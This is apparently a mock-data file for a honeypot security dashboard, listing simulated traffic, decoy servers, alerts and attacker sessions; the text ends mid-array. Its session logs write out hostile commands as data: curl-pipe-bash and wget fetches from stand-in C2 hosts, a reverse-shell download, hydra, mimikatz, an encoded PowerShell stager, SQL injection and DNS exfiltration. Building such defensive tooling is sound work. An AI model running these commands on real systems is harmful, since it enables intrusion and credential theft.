// ---------------- MOCK DATA COLLECTIONS ----------------
export const INITIAL_TRAFFIC = [
    {
        id: "TRF-90214",
        timestamp: "19:16:42",
        sourceIp: "185.220.101.42",
        country: "Netherlands (Tor Exit)",
        countryCode: "NL",
        request: "POST /api/v1/auth/token",
        protocol: "HTTPS",
        riskScore: 98,
        decision: "Redirected",
        status: "Diverted",
        asn: "AS200651 (Tor Network)",
        isp: "Tor Project Relay Node",
        ghostEnvironment: "Ubuntu Web Server",
        userAgent: "Mozilla/5.0 (Hydra/9.5-dev; Brute-Force Bot)",
        payloadAnomaly: "Credential Stuffing Signature + High Request Frequency (120 req/s)",
        threatSignals: ["Known Tor Exit Node", "Rapid Credential Cycling", "User-Agent Fingerprint Mismatch", "Header Entropy Anomaly"],
        decisionReason: "Automated routing engine detected high-velocity credential brute-forcing. Diverted to decoy auth service with synthetic slow responses.",
    },
    {
        id: "TRF-90213",
        timestamp: "19:16:38",
        sourceIp: "103.145.73.12",
        country: "China",
        countryCode: "CN",
        request: "GET /.env",
        protocol: "HTTPS",
        riskScore: 94,
        decision: "Redirected",
        status: "Diverted",
        asn: "AS4134 (Chinanet)",
        isp: "China Telecom Backbone",
        ghostEnvironment: "Ubuntu Web Server",
        userAgent: "python-requests/2.31.0",
        payloadAnomaly: "Sensitive File Reconnaissance Path Traversal",
        threatSignals: ["Automated Scanner User-Agent", "Sensitive Path Probe", "Non-Standard Cipher Suite"],
        decisionReason: "Request targeted sensitive environment configuration files. Diverted to decoy containing seeded canary AWS and database credentials.",
    },
    {
        id: "TRF-90212",
        timestamp: "19:16:31",
        sourceIp: "192.0.2.145",
        country: "United States",
        countryCode: "US",
        request: "GET /dashboard/analytics",
        protocol: "HTTP/2",
        riskScore: 8,
        decision: "Allowed",
        status: "Safe",
        asn: "AS7018 (AT&T Services)",
        isp: "AT&T Internet Services",
        userAgent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
        threatSignals: ["Valid SSO Session Token", "Normal Typing Cadence", "Known Corporate IP CIDR"],
        decisionReason: "Authenticated enterprise session with normal behavioral biometrics and valid TLS client fingerprint.",
    },
    {
        id: "TRF-90211",
        timestamp: "19:16:25",
        sourceIp: "45.154.255.89",
        country: "Russia",
        countryCode: "RU",
        request: "POST /actuator/gateway/routes",
        protocol: "HTTPS",
        riskScore: 99,
        decision: "Redirected",
        status: "Diverted",
        asn: "AS49981 (WorldStream B.V.)",
        isp: "Bulletproof Hosting Cluster",
        ghostEnvironment: "Windows Enterprise Server",
        userAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        payloadAnomaly: "Spring Cloud Gateway RCE (CVE-2022-22947) exploit attempt in SPEL body",
        threatSignals: ["Spring Core Exploit Signature", "Malicious Remote Code Injection", "Obfuscated Base64 Shellcode"],
        decisionReason: "Immediate diversion triggered upon detection of Spring RCE payload. Routed to isolated sandbox Windows decoy.",
    },
    {
        id: "TRF-90210",
        timestamp: "19:16:19",
        sourceIp: "198.51.100.34",
        country: "Germany",
        countryCode: "DE",
        request: "GET /api/v2/orders?limit=50",
        protocol: "HTTPS",
        riskScore: 14,
        decision: "Allowed",
        status: "Safe",
        asn: "AS3320 (Deutsche Telekom)",
        isp: "Deutsche Telekom AG",
        userAgent: "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0",
        threatSignals: ["Trusted Partner API Key", "Compliant Rate Limits"],
        decisionReason: "Legitimate REST API invocation verified against partner registry with valid OAuth2 bearer token.",
    },
    {
        id: "TRF-90209",
        timestamp: "19:16:11",
        sourceIp: "194.26.29.112",
        country: "Iran",
        countryCode: "IR",
        request: "CONNECT 10.0.4.15:22",
        protocol: "SSH",
        riskScore: 96,
        decision: "Redirected",
        status: "Diverted",
        asn: "AS58224 (Iran Telecommunication)",
        isp: "TCI Infrastructure",
        ghostEnvironment: "Kubernetes Honeynet",
        userAgent: "libssh-0.9.5-cyberprobe",
        payloadAnomaly: "SSH Banner Grabbing & Lateral Port Scanning",
        threatSignals: ["Internal RFC1918 Probing", "Known SSH Exploit Toolkit", "Zero Authorized Keys"],
        decisionReason: "Attempted lateral traversal to internal management port 22. Trapped in virtual honeypot node.",
    },
    {
        id: "TRF-90208",
        timestamp: "19:15:58",
        sourceIp: "172.56.21.90",
        country: "United States",
        countryCode: "US",
        request: "GET /static/css/theme.css",
        protocol: "HTTP/2",
        riskScore: 2,
        decision: "Allowed",
        status: "Safe",
        asn: "AS21928 (T-Mobile USA)",
        isp: "T-Mobile USA Inc",
        userAgent: "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X)",
        threatSignals: ["Edge CDN Hit", "Static Asset Request"],
        decisionReason: "Routine static asset request through verified edge distribution network.",
    },
    {
        id: "TRF-90207",
        timestamp: "19:15:44",
        sourceIp: "89.248.165.71",
        country: "Seychelles",
        countryCode: "SC",
        request: "GET /solr/admin/info/system?wt=json",
        protocol: "HTTPS",
        riskScore: 92,
        decision: "Redirected",
        status: "Diverted",
        asn: "AS202425 (IP Volume Inc)",
        isp: "Offshore VPN Provider",
        ghostEnvironment: "Ubuntu Web Server",
        userAgent: "Go-http-client/1.1",
        payloadAnomaly: "Apache Solr Log4j / RCE Recon Probe",
        threatSignals: ["Solr Admin Probe", "Suspicious JNDI Lookup in Headers"],
        decisionReason: "Heuristic engine detected JNDI/Log4j probe string in headers. Diverted to Ubuntu Decoy.",
    },
    {
        id: "TRF-90206",
        timestamp: "19:15:30",
        sourceIp: "193.106.191.24",
        country: "Brazil",
        countryCode: "BR",
        request: "POST /wp-login.php",
        protocol: "HTTPS",
        riskScore: 88,
        decision: "Redirected",
        status: "Diverted",
        asn: "AS28573 (Claro Brasil)",
        isp: "Claro Telecom",
        ghostEnvironment: "Ubuntu Web Server",
        userAgent: "Mozilla/5.0 (X11; Ubuntu; Linux x86_64)",
        payloadAnomaly: "WordPress CMS Scanning against Non-WP Microservice",
        threatSignals: ["Blind CMS Scanner", "High Request Concurrency"],
        decisionReason: "Non-existent WordPress endpoint targeted. Diverted to capture attacker script signature.",
    },
    {
        id: "TRF-90205",
        timestamp: "19:15:12",
        sourceIp: "203.0.113.88",
        country: "Singapore",
        countryCode: "SG",
        request: "POST /api/v1/checkout/payment",
        protocol: "HTTPS",
        riskScore: 45,
        decision: "Monitoring",
        status: "Suspicious",
        asn: "AS4657 (StarHub Ltd)",
        isp: "StarHub Internet",
        userAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        threatSignals: ["Elevated Velocity", "Card Validation Retry x3"],
        decisionReason: "Slight anomaly in checkout timing. Flagged for passive behavioral telemetry without blocking.",
    },
];
export const GHOST_ENVIRONMENTS = [
    {
        id: "ENV-01",
        name: "Ubuntu Production Decoy Alpha",
        os: "Ubuntu 24.04 LTS",
        type: "Web Server",
        status: "Running",
        activeSessions: 6,
        isolationHealth: 100,
        cpuUsage: 18.4,
        memoryUsage: 42.1,
        lastActivity: "42 seconds ago",
        ipAddress: "10.240.12.8",
        canaryTokensPlanted: 14,
        canariesTripped: 3,
        simulationLevel: "High Fidelity",
        loggingLevel: "Verbose + eBPF",
        uptime: "48d 14h 22m",
    },
    {
        id: "ENV-02",
        name: "Windows Active Directory Decoy",
        os: "Windows Server 2022",
        type: "Enterprise Server",
        status: "Running",
        activeSessions: 8,
        isolationHealth: 100,
        cpuUsage: 34.2,
        memoryUsage: 68.9,
        lastActivity: "12 seconds ago",
        ipAddress: "10.240.14.22",
        canaryTokensPlanted: 28,
        canariesTripped: 9,
        simulationLevel: "Full Kernel Emulation",
        loggingLevel: "Verbose + eBPF",
        uptime: "21d 08h 15m",
    },
    {
        id: "ENV-03",
        name: "Postgres Customer Vault Decoy",
        os: "PostgreSQL 16 Cluster",
        type: "Database",
        status: "Running",
        activeSessions: 2,
        isolationHealth: 100,
        cpuUsage: 12.8,
        memoryUsage: 31.4,
        lastActivity: "3 minutes ago",
        ipAddress: "10.240.18.5",
        canaryTokensPlanted: 45,
        canariesTripped: 1,
        simulationLevel: "High Fidelity",
        loggingLevel: "Kernel Syscalls",
        uptime: "94d 02h 40m",
    },
    {
        id: "ENV-04",
        name: "Lead Engineer Workstation Mac/Linux",
        os: "Developer Mac/Linux",
        type: "Workstation",
        status: "Running",
        activeSessions: 2,
        isolationHealth: 99.8,
        cpuUsage: 9.2,
        memoryUsage: 24.6,
        lastActivity: "8 minutes ago",
        ipAddress: "10.240.22.101",
        canaryTokensPlanted: 18,
        canariesTripped: 2,
        simulationLevel: "High Fidelity",
        loggingLevel: "Verbose + eBPF",
        uptime: "12d 19h 55m",
    },
    {
        id: "ENV-05",
        name: "Enterprise S3 Cloud Storage Gateway",
        os: "AWS S3 Gateway",
        type: "Cloud Storage",
        status: "Running",
        activeSessions: 0,
        isolationHealth: 100,
        cpuUsage: 3.1,
        memoryUsage: 14.5,
        lastActivity: "2 hours ago",
        ipAddress: "10.240.30.50",
        canaryTokensPlanted: 32,
        canariesTripped: 0,
        simulationLevel: "Medium Fidelity",
        loggingLevel: "Network Only",
        uptime: "110d 05h 12m",
    },
    {
        id: "ENV-06",
        name: "Kubernetes Cluster Honeynet Node",
        os: "Kubernetes Honeynet",
        type: "Container Pod",
        status: "Running",
        activeSessions: 4,
        isolationHealth: 100,
        cpuUsage: 22.7,
        memoryUsage: 53.0,
        lastActivity: "1 minute ago",
        ipAddress: "10.240.90.14",
        canaryTokensPlanted: 20,
        canariesTripped: 4,
        simulationLevel: "Full Kernel Emulation",
        loggingLevel: "Verbose + eBPF",
        uptime: "15d 11h 04m",
    },
];
export const ATTACK_SESSIONS = [
    {
        id: "SES-8821",
        sourceIp: "185.220.101.42",
        country: "Netherlands (Tor)",
        attackType: "Brute Force",
        riskScore: 98,
        ghostEnvironment: "Ubuntu Web Server",
        duration: "18m 42s",
        commandsCaptured: 34,
        status: "Active",
        startedAt: "19:00:15",
        lastActive: "19:18:57",
        techniqueId: "T1110.001",
        techniqueName: "Password Guessing",
        behaviourScore: 96,
        analystNotes: "Attacker using automated password spray against mock SSH daemon. Seeds of canary credentials provided; awaiting credential usage in wild.",
        terminalLogs: [
            { time: "19:00:22", command: "ssh -o StrictHostKeyChecking=no root@10.240.12.8", output: "Permission denied (publickey,password).", isSuspicious: true },
            { time: "19:01:05", command: "hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.240.12.8", output: "[22][ssh] host: 10.240.12.8   login: admin   password: Password2024!", isSuspicious: true },
            { time: "19:02:18", command: "ssh admin@10.240.12.8", output: "Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-31-generic x86_64)", isSuspicious: false },
            { time: "19:02:30", command: "whoami && id", output: "uid=1001(admin) gid=1001(admin) groups=1001(admin),27(sudo)", isSuspicious: true },
            { time: "19:03:12", command: "cat /etc/passwd | grep -E '/bin/bash|/bin/sh'", output: "root:x:0:0:root:/root:/bin/bash\nadmin:x:1001:1001:Admin:/home/admin:/bin/bash\ndeveloper:x:1002:1002:Dev:/home/developer:/bin/bash", isSuspicious: true },
            { time: "19:04:45", command: "ls -la /var/www/html", output: "total 48\ndrwxr-xr-x  4 www-data www-data  4096 Sep 12 11:20 .\n-rw-r--r--  1 www-data www-data 10240 Sep 12 11:15 index.php\n-rw-------  1 www-data www-data   890 Sep 12 11:18 .env", isSuspicious: true },
            { time: "19:05:30", command: "cat /var/www/html/.env", output: "APP_ENV=production\nDB_HOST=10.240.18.5\nDB_PASS=Ghost_Canary_Token_v99\nAWS_SECRET_KEY=AKIAIOSFODNN7CANARYKEY", isSuspicious: true },
            { time: "19:08:14", command: "curl -s http://malicious-c2.darknet/payload.sh | bash", output: "[*] Downloading staging beacon... [Ghost Sandbox Intercepted: Simulated Execution OK]", isSuspicious: true },
            { time: "19:12:00", command: "sudo -l", output: "User admin may run the following commands on ubuntu-prod-01:\n    (ALL : ALL) NOPASSWD: /usr/bin/python3", isSuspicious: true },
            { time: "19:14:22", command: "sudo python3 -c 'import pty; pty.spawn(\"/bin/bash\")'", output: "root@ubuntu-prod-01:~# [Root Shell Trapped in Isolation Layer]", isSuspicious: true },
            { time: "19:17:40", command: "find / -perm -4000 2>/dev/null", output: "/usr/bin/passwd\n/usr/bin/chsh\n/usr/bin/sudo", isSuspicious: true },
        ],
        filesAccessed: [
            { path: "/var/www/html/.env", isCanary: true, action: "READ" },
            { path: "/etc/shadow", isCanary: true, action: "READ" },
            { path: "/home/admin/.ssh/id_rsa", isCanary: true, action: "DOWNLOAD" },
            { path: "/tmp/staging.sh", isCanary: false, action: "WRITE" },
        ],
        payloadAttempts: [
            "curl -s http://malicious-c2.darknet/payload.sh | bash",
            "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
            "wget http://185.220.101.42:8080/reverse_shell.elf -O /tmp/kworker",
        ],
        lateralAttempts: [
            "Subnet Scan -> 10.240.18.0/24 (Postgres Decoy Subnet)",
            "Probed Port 5432 with Decoy Password",
        ],
    },
    {
        id: "SES-8820",
        sourceIp: "45.154.255.89",
        country: "Russia",
        attackType: "Web Exploit",
        riskScore: 99,
        ghostEnvironment: "Windows Enterprise Server",
        duration: "42m 11s",
        commandsCaptured: 61,
        status: "Active",
        startedAt: "18:36:40",
        lastActive: "19:17:22",
        techniqueId: "T1059.001",
        techniqueName: "PowerShell In-Memory Injection",
        behaviourScore: 98,
        analystNotes: "Identified advanced persistent threat actor using Cobalt Strike reflective loader. Ghost deception is feeding fake Active Directory forest records.",
        terminalLogs: [
            { time: "18:37:10", command: "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA==", output: "Cobalt Strike Beacon connected. Decoy listener responded with mock staged tasking.", isSuspicious: true },
            { time: "18:40:15", command: "whoami /priv", output: "SeChangeNotifyPrivilege: Enabled\nSeSecurityPrivilege: Disabled", isSuspicious: true },
            { time: "18:48:30", command: "net user /domain", output: "User accounts for CORP.INTERNAL\n---------------------------------------\nAdministrator    svc_backup    s_vance\nkrbtgt           db_admin      finance_lead", isSuspicious: true },
            { time: "19:05:00", command: "mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit", output: "Decoy LSASS memory spoofed: Dumped 4 Honey-hashes to Attacker Terminal.", isSuspicious: true },
            { time: "19:16:10", command: "nltest /dclist:CORP.INTERNAL", output: "List of DCs in Domain 'CORP.INTERNAL':\n\\\\DC01-DECOY.CORP.INTERNAL [PDC]", isSuspicious: true },
        ],
        filesAccessed: [
            { path: "C:\\Windows\\System32\\config\\SAM", isCanary: true, action: "READ" },
            { path: "C:\\Users\\Administrator\\Desktop\\finance_passwords.xlsx", isCanary: true, action: "DOWNLOAD" },
            { path: "C:\\ProgramData\\update.vbs", isCanary: false, action: "WRITE" },
        ],
        payloadAttempts: [
            "PowerShell Encoded Command Memory Loader",
            "Decoy LSASS Process Memory Injection",
            "Named Pipe Cobalt Strike Stager (\\pipe\\msse-8491-server)",
        ],
        lateralAttempts: [
            "RPC Sweep to \\\\DC01-DECOY.CORP.INTERNAL",
            "Kerberoasting request against svc_backup account",
        ],
    },
    {
        id: "SES-8819",
        sourceIp: "103.145.73.12",
        country: "China",
        attackType: "Port Scan",
        riskScore: 78,
        ghostEnvironment: "Ubuntu Web Server",
        duration: "1h 14m",
        commandsCaptured: 19,
        status: "Completed",
        startedAt: "17:50:00",
        lastActive: "19:04:00",
        techniqueId: "T1046",
        techniqueName: "Network Service Discovery",
        behaviourScore: 75,
        analystNotes: "Masscan / ZMap sweep diverted to honeynet port responder. Emulated 65,535 fake listening ports to exhaust attacker scanner threads.",
        terminalLogs: [
            { time: "17:50:10", command: "nmap -sS -p 1-1000 -T4 10.240.12.8", output: "Synthetic tarpit responded with 1,000 open dummy banner ports.", isSuspicious: true },
            { time: "18:12:00", command: "nikto -h http://10.240.12.8:8080", output: "+ Server: Apache-Coyote/1.1 (Decoy)\n+ Anti-clickjacking X-Frame-Options header is missing.", isSuspicious: true },
        ],
        filesAccessed: [
            { path: "/robots.txt", isCanary: true, action: "READ" },
            { path: "/phpmyadmin/index.php", isCanary: true, action: "READ" },
        ],
        payloadAttempts: ["Nikto Automated Web Scan Probe", "Masscan TCP SYN Sweep"],
        lateralAttempts: [],
    },
    {
        id: "SES-8818",
        sourceIp: "194.26.29.112",
        country: "Iran",
        attackType: "Suspicious Payload",
        riskScore: 96,
        ghostEnvironment: "Kubernetes Honeynet",
        duration: "26m 50s",
        commandsCaptured: 28,
        status: "Active",
        startedAt: "18:52:10",
        lastActive: "19:19:00",
        techniqueId: "T1610",
        techniqueName: "Deploy Container RCE",
        behaviourScore: 95,
        analystNotes: "Adversary attempting Kubernetes cluster breakout via compromised kubelet API socket. Decoy node responding with fake etcd pods.",
        terminalLogs: [
            { time: "18:52:45", command: "kubectl get pods --all-namespaces", output: "NAMESPACE     NAME                   READY   STATUS    RESTARTS   AGE\ndefault       payment-service-x74    1/1     Running   0          4d\nkube-system   coredns-64897985d-qf   1/1     Running   0          40d", isSuspicious: true },
            { time: "18:55:02", command: "kubectl exec -it payment-service-x74 -- /bin/sh", output: "$ [Inside Sandboxed Honeynet Container]", isSuspicious: true },
            { time: "18:57:30", command: "cat /var/run/secrets/kubernetes.io/serviceaccount/token", output: "eyJhbGciOiJSUzI1NiIsImtpZCI6IkNhbmFyeUt1YmVUb2tlbjIwMjQifQ.fake_payload.sign", isSuspicious: true },
        ],
        filesAccessed: [
            { path: "/var/run/secrets/kubernetes.io/serviceaccount/token", isCanary: true, action: "READ" },
            { path: "/run/containerd/containerd.sock", isCanary: true, action: "STAT" },
        ],
        payloadAttempts: [
            "Container Escape via HostPath mount injection",
            "Kubelet Unauthorized API Query (/pods)",
        ],
        lateralAttempts: [
            "API request to https://10.240.90.1:443 (Fake Decoy Master)",
        ],
    },
    {
        id: "SES-8817",
        sourceIp: "89.248.165.71",
        country: "Seychelles",
        attackType: "Zero-Day Probe",
        riskScore: 93,
        ghostEnvironment: "PostgreSQL 16 Cluster",
        duration: "55m 20s",
        commandsCaptured: 22,
        status: "Completed",
        startedAt: "16:40:00",
        lastActive: "17:35:20",
        techniqueId: "T1190",
        techniqueName: "Exploit Public-Facing Application",
        behaviourScore: 91,
        analystNotes: "SQL injection probe against customer lookup API. Database returned synthetic customer records containing tracking beacon tokens.",
        terminalLogs: [
            { time: "16:40:15", command: "' UNION SELECT username, password_hash, ssn FROM users --", output: "Returned 50 fake user profiles with Canary SSNs.", isSuspicious: true },
            { time: "17:10:00", command: "SELECT pg_read_file('/etc/passwd')", output: "postgres:x:105:111:PostgreSQL Administrator,,,:/var/lib/postgresql:/bin/bash", isSuspicious: true },
        ],
        filesAccessed: [
            { path: "/var/lib/postgresql/data/pg_hba.conf", isCanary: true, action: "READ" },
        ],
        payloadAttempts: ["Stacked SQL Queries with Sleep Injection", "OOB DNS Exfiltration Probe"],
        lateralAttempts: ["DNS Exfiltration to attacker domain ns1.evil-data.com"],
    },
];
export const THREAT_ALERTS = [
    {
        id: "ALT-4091",
        severity: "Critical",
        title: "Cobalt Strike Beacon Detected in Windows Decoy",
        sourceIp: "45.154.255.89",
        country: "Russia",
        timestamp: "2 minutes ago",
        affectedEnvironment: "Windows Active Directory Decoy (ENV-02)",
        explanation: "Adversary initiated in-memory reflective injection of Cobalt Strike beacon. Diversion engine successfully isolated session; zero lateral connectivity to production active directory.",
        status: "Open",
        assignedAnalyst: {
            name: "Cmdr. Sarah Vance",
            role: "Lead SecOps Architect",
            avatar: "SV",
        },
        timeline: [
            { time: "19:14:10", event: "Initial Spring RCE attempt diverted into Windows Decoy", severity: "warning" },
            { time: "19:15:30", event: "Adversary staged PowerShell base64 encoded stager", severity: "warning" },
            { time: "19:16:05", event: "Beacon connection acknowledged by isolated fake C2 proxy", severity: "critical" },
            { time: "19:17:15", event: "Decoy LSASS memory honey-hash requested & served", severity: "critical" },
        ],
        playbookActions: [
            "Add IP 45.154.255.89 to Edge Perimeter Persistent Blacklist",
            "Feed poisoned Active Directory credentials to threat intelligence feeds",
            "Rotate decoy memory seeds in Windows Environment ENV-02",
            "Export MITRE T1059.001 IOC bundle to SIEM / Sentinel",
        ],
    },
    {
        id: "ALT-4090",
        severity: "Critical",
        title: "Canary AWS Key Tripped in Ubuntu Decoy",
        sourceIp: "185.220.101.42",
        country: "Netherlands (Tor)",
        timestamp: "11 minutes ago",
        affectedEnvironment: "Ubuntu Production Decoy Alpha (ENV-01)",
        explanation: "Canary token 'AKIAIOSFODNN7CANARYKEY' was exfiltrated from decoy .env file and queried against AWS STS GetCallerIdentity.",
        status: "Investigating",
        assignedAnalyst: {
            name: "Marcus Chen",
            role: "Senior Threat Hunter",
            avatar: "MC",
        },
        timeline: [
            { time: "19:05:30", event: "Canary .env read in Ubuntu Sandbox", severity: "info" },
            { time: "19:08:12", event: "Canary token activated from external IP 185.220.101.42", severity: "critical" },
            { time: "19:08:14", event: "AWS CloudTrail alert received; attacker location mapped", severity: "warning" },
        ],
        playbookActions: [
            "Quarantine attacker Tor node in WAF policy",
            "Notify Cloud Security team of confirmed exfiltration trap",
            "Maintain active sandbox session to observe secondary tools",
        ],
    },
    {
        id: "ALT-4089",
        severity: "High",
        title: "Kubernetes Container Breakout Attempt Intercepted",
        sourceIp: "194.26.29.112",
        country: "Iran",
        timestamp: "24 minutes ago",
        affectedEnvironment: "Kubernetes Honeynet Node (ENV-06)",
        explanation: "Container escape attempt via containerd Unix domain socket intercepted by eBPF telemetry hook. Honeynet remained 100% segregated.",
        status: "Investigating",
        assignedAnalyst: {
            name: "Elena Rostova",
            role: "Cloud SecOps Engineer",
            avatar: "ER",
        },
        timeline: [
            { time: "18:55:02", event: "Interactive shell spawned in decoy container", severity: "warning" },
            { time: "18:57:30", event: "ServiceAccount token harvested", severity: "warning" },
            { time: "19:01:20", event: "Host socket traversal trapped by kernel sandbox", severity: "critical" },
        ],
        playbookActions: [
            "Isolate honeynet pod container network interface",
            "Snapshot container memory image for forensics",
            "Update eBPF rule signature for Kubernetes cluster",
        ],
    },
    {
        id: "ALT-4088",
        severity: "Medium",
        title: "Automated Reconnaissance Sweep from Known Proxy ASN",
        sourceIp: "103.145.73.12",
        country: "China",
        timestamp: "1 hour ago",
        affectedEnvironment: "Ubuntu Production Decoy Alpha (ENV-01)",
        explanation: "Over 450 requests probing common admin panels (phpmyadmin, solr, swagger) routed to synthetic delay server.",
        status: "Resolved",
        assignedAnalyst: {
            name: "Cmdr. Sarah Vance",
            role: "Lead SecOps Architect",
            avatar: "SV",
        },
        timeline: [
            { time: "17:50:00", event: "Reconnaissance scan started", severity: "info" },
            { time: "18:15:00", event: "Auto-diversion policy engaged", severity: "info" },
            { time: "18:40:00", event: "Scan completed with zero real assets exposed", severity: "info" },
        ],
        playbookActions: [
            "Rule automatically auto-resolved after scan cessation",
            "Fingerprint cached in edge intelligence table",
        ],
    },
    {
        id: "ALT-4087",
        severity: "Low",
        title: "Elevated Checkout Velocity from New ASN",
        sourceIp: "203.0.113.88",
        country: "Singapore",
        timestamp: "2 hours ago",
        affectedEnvironment: "Edge Perimeter Proxy",
        explanation: "Subtle velocity anomaly in payment checkout API. Heuristic scoring set to 45; currently passively monitored.",
        status: "Resolved",
        assignedAnalyst: {
            name: "David Kim",
            role: "Application Security Analyst",
            avatar: "DK",
        },
        timeline: [
            { time: "17:15:10", event: "Velocity threshold reached 3x standard baseline", severity: "info" },
            { time: "17:25:00", event: "Transaction completed with valid 3DS challenge", severity: "info" },
        ],
        playbookActions: [
            "Verified legitimate flash-sale buyer with 3D-Secure approval",
            "De-escalated to benign status",
        ],
    },
];
export const SYSTEM_ARCHITECTURE_LAYERS = [
    {
        id: 1,
        name: "Perimeter Monitoring Layer",
        shortName: "Perimeter Ingress",
        status: "Operational",
        latency: "1.2 ms",
        processedEvents: "1.28M / day",
        role: "Inspects incoming Layer 4-7 requests at the network edge with zero TLS decryption penalty. Computes client entropy, header authenticity, and TLS JA3/JA4 fingerprints.",
        description: "Serves as the high-throughput edge inspection gate. Categorizes traffic into verified legitimate users, known good automated partners, and suspicious or unknown actors.",
        isolationGuarantee: "Hardware-enforced edge proxy without access to internal network secrets.",
        subsystems: ["eBPF Flow Sniffer", "TLS JA4 Fingerprinter", "IP Reputation Grid", "ASN Anomaly Classifier"],
    },
    {
        id: 2,
        name: "Decision and Diversion Engine",
        shortName: "AI Decision Engine",
        status: "Operational",
        latency: "2.8 ms",
        processedEvents: "142k / hr",
        role: "Real-time AI behavioral decision classifier that transparently routes traffic. Legitimate users reach the real infrastructure; threats are invisibly swapped into Ghost Environments.",
        description: "Uses a low-latency neural decision tree combined with heuristic rules. The attacker perceives a completely normal HTTP 200 response or SSH handshake, completely unaware they are in a synthetic reality.",
        isolationGuarantee: "Stateless transparent proxying. The redirection is purely server-side with no client redirect headers or traces.",
        subsystems: ["Neural Decision Classifier", "Policy Route Matrix", "Canary Trigger Engine", "Session Affinity Broker"],
    },
    {
        id: 3,
        name: "Ghost Environment",
        shortName: "Ghost Decoys",
        status: "Active Deception",
        latency: "3.4 ms",
        processedEvents: "18 Active Sessions",
        role: "Hyper-realistic synthetic server clones (Ubuntu, Windows Server, PostgreSQL, K8s). Seeded with authentic-looking configurations, code repositories, and traceable canary data.",
        description: "Provides attackers with a high-fidelity playground that mimics the target organization's exact stack. Attackers spend days attacking fake databases and fake source repositories.",
        isolationGuarantee: "Completely zero egress routing to real corporate servers. Fake subnets simulate internal networks.",
        subsystems: ["Ubuntu 24.04 Decoy", "Windows AD Decoy", "Postgres Vault Decoy", "K8s Microservices Node"],
    },
    {
        id: 4,
        name: "Isolation Sandbox",
        shortName: "Sandbox Containment",
        status: "Operational",
        latency: "0.4 ms",
        processedEvents: "100% Contained",
        role: "Virtualization hypervisor and kernel namespace containment. Prevents any ghost environment breakout or lateral movement toward real production hosts.",
        description: "Hardened microVM and gVisor isolation architecture. Any exploit targeting the host OS or hypervisor is trapped within immutable RAM-backed snapshot volumes.",
        isolationGuarantee: "Unidirectional data diode. No network route, routing table entry, or socket can communicate back to production infrastructure.",
        subsystems: ["MicroVM Firecracker Slices", "gVisor Syscall Filter", "One-Way Memory Diode", "Dynamic Tarpit Throttler"],
    },
    {
        id: 5,
        name: "Behavioural Intelligence Recorder",
        shortName: "Telemetry Recorder",
        status: "Operational",
        latency: "4.1 ms",
        processedEvents: "4.8k cmds / hr",
        role: "Continuous eBPF and kernel auditing. Records every keystroke, bash command, memory injection, file access, and network egress attempt into structured threat intelligence.",
        description: "Transforms attacker curiosity into forensic gold. Automatically maps activities to MITRE ATT&CK techniques, extracts IOC hashes, and generates defensive firewall rules.",
        isolationGuarantee: "Read-only streaming pipeline over cryptographic hardware bus to immutable storage.",
        subsystems: ["eBPF Keystroke Sniffer", "MITRE ATT&CK Auto-Mapper", "Memory Dump Analyzer", "Canary Tripwire Notifier"],
    },
    {
        id: 6,
        name: "Dashboard and Visualization Layer",
        shortName: "Command Center SOC",
        status: "Operational",
        latency: "16 ms UI Render",
        processedEvents: "Live Feed Active",
        role: "Single-pane-of-glass interface for SecOps teams. Real-time command center, live stream packet inspector, terminal session replay, and automated reporting.",
        description: "Empowers security analysts with complete situational awareness, allowing one-click analyst actions, automated threat report exports, and full session terminal playback.",
        isolationGuarantee: "Strict RBAC, OAuth2 SSO integration, and SOC2 audit-logged web console.",
        subsystems: ["Live WebSocket Streamer", "Terminal Replayer", "Attack Topology Visualizer", "Executive Report Engine"],
    },
];
export const ATTACK_ORIGINS = [
    { country: "Russia", countryCode: "RU", percentage: 34.2, divertedAttacks: 974, dominantType: "Cobalt Strike & Web Exploit" },
    { country: "China", countryCode: "CN", percentage: 22.8, divertedAttacks: 649, dominantType: "Reconnaissance & Zero-Day" },
    { country: "Netherlands (Tor)", countryCode: "NL", percentage: 16.4, divertedAttacks: 467, dominantType: "Brute Force & Credential Stuffing" },
    { country: "Iran", countryCode: "IR", percentage: 11.2, divertedAttacks: 319, dominantType: "K8s Breakout & Reverse Shell" },
    { country: "Brazil", countryCode: "BR", percentage: 8.5, divertedAttacks: 242, dominantType: "Masscan & CMS Botnets" },
    { country: "Seychelles (Offshore)", countryCode: "SC", percentage: 6.9, divertedAttacks: 196, dominantType: "SQL Injection & Data Exfil" },
];
export const MITRE_TECHNIQUES = [
    { technique: "Password Guessing / Brute Force", id: "T1110.001", count: 842, percentage: 29.5, trend: "+28%" },
    { technique: "Command & Scripting Interpreter", id: "T1059.001", count: 614, percentage: 21.5, trend: "+19%" },
    { technique: "Exploit Public-Facing Application", id: "T1190", count: 489, percentage: 17.2, trend: "+12%" },
    { technique: "Network Service Discovery", id: "T1046", count: 412, percentage: 14.5, trend: "-5%" },
    { technique: "Deploy Container / Breakout", id: "T1610", count: 288, percentage: 10.1, trend: "+4%" },
    { technique: "Valid Accounts / Credential Abuse", id: "T1078", count: 202, percentage: 7.2, trend: "+12%" },
];
export const FREQUENT_COMMANDS = [
    { command: "cat /etc/passwd", count: 914, risk: "High" },
    { command: "whoami && id", count: 852, risk: "Medium" },
    { command: "curl -s http://.../sh | bash", count: 541, risk: "Critical" },
    { command: "powershell -enc ...", count: 478, risk: "Critical" },
    { command: "find / -perm -4000", count: 395, risk: "High" },
    { command: "cat /var/www/html/.env", count: 382, risk: "Critical" },
    { command: "nmap -sS -T4", count: 340, risk: "Medium" },
    { command: "kubectl get pods", count: 291, risk: "High" },
    { command: "mimikatz \"sekurlsa...\"", count: 210, risk: "Critical" },
    { command: "sudo -l", count: 195, risk: "High" },
];
export const IOC_RECORDS = [
    { type: "IP Address", value: "185.220.101.42", confidence: "100%", origin: "Tor Exit Node", firstSeen: "2026-09-12", action: "Active Block" },
